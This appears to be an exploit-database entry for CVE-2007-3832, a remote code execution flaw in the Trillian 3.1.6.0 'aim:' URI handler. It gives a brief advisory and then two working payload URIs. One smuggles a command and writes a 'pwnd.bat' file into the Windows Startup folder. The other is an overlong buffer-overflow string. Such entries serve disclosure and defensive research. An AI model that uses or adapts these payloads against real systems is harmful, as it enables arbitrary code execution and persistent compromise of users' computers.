Trillian 3.1.6.0 - URI Handler Remote Code Execution
Author: Nate Mcfeters
type: remote
platform: windows
port:
date_added: 2007-07-16
date_updated: 2013-12-16
verified: 1
codes: CVE-2007-3832;OSVDB-38171
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/24927/info
Trillian is prone to remote command- and code-execution vulnerabilities because the application fails to properly handle user-supplied input via a registered URI.
Successfully exploiting these issues allows attackers to execute arbitrary commands or code in the context of the affected application.
aim:%20&c:/windows/system32/calc.exe%22%20ini=%22C:/Documents%20and%20Settings/All%20Users/Start%20Menu/Programs/Startup/pwnd.bat%22
aim:/#1111111/11111111111111111111111111111111111111111111111111111111111112222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222226666666AAAABBBB6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666